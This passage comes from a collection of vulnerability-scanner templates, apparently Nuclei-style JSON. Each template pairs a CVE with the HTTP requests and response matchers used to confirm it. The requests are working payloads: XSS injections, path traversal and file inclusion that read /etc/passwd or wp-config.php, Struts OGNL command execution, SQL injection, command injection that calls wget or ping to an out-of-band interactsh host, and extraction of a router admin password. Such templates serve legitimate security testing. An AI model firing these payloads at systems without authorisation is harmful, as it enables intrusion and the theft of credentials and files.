Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/yousaytoo-auto-publishing-plugin/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Wordpress Integrator"]}]},{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-0392","info":{"name":"Apache Struts2 S2-008 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0896","info":{"name":"Count Per Day <= 3.1 - download.php f Parameter Traversal Arbitrary File Access","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/count-per-day/download.php?n=1&f=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4768","info":{"name":"WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Download Monitor ="]}]},{"method":"GET","path":["{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1835","info":{"name":"WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["All-in-One Event Calendar"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["MF Gig Calendar ="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-2371","info":{"name":"WP-FaceThumb 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["WP-FaceThumb ==="]}]},{"method":"GET","path":["{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4889","info":{"name":"ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4273","info":{"name":"2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["2 Click Social Media Buttons","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4878","info":{"name":"FlatnuX CMS - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0991","info":{"name":"OpenEMR 4.1 - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Code Snippets"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6195","info":{"name":"vBulletin <= 4.2.3 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27","{{BaseURL}}/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27"],"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["type=dberror"]},{"type":"status","status":[200,503],"condition":"or"}]}]},{"id":"CVE-2016-1000136","info":{"name":"WordPress heat-trackr 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/heat-trackr/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-10924","info":{"name":"Wordpress Zedna eBook download <1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3081","info":{"name":"Apache S2-032 Struts - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login?redir=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-1000126","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Admin Font Editor"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-10960","info":{"name":"WordPress wSecure Lite < 2.4 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php"],"body":"wsecure_action=update&publish=\";} header(\"{{name}}: CVE-2016-10960\"); class WSecureConfig2 {var $test=\"","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["{{name}}: CVE-2016-10960"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000138","info":{"name":"WordPress Admin Font Editor <=1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["= Indexisto"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/hdw-tube/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["HDW WordPress Video Gallery"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000133","info":{"name":"WordPress forget-about-shortcode-buttons 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/forget-about-shortcode-buttons/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Forget About Shortcode Buttons ="]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000131","info":{"name":"WordPress e-search <=1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/e-search/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Search","Tags:","Tested up to:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-7981","info":{"name":"SPIP <3.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ecrire/?exec=valider_xml&var_url=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1555","info":{"name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /boardDataWW.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nmacAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23&reginfo=0&writeData=Submit\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2016-10368","info":{"name":"Opsview Monitor Pro - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin_username={{username}}&login_password={{password}}&login=&back=//www.interact.sh&app=OPSVIEW\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/tidio-gallery/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Tidio Gallery","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/enhanced-tooltipglossary/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["CM Tooltip Glossary"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["PhotoXhibit","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000127","info":{"name":"WordPress AJAX Random Post <=2.00 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Ajax Random Post"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10108","info":{"name":"Western Digital MyCloud NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nCookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"WDMyCloud\")","contains(interactsh_protocol, \"dns\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site 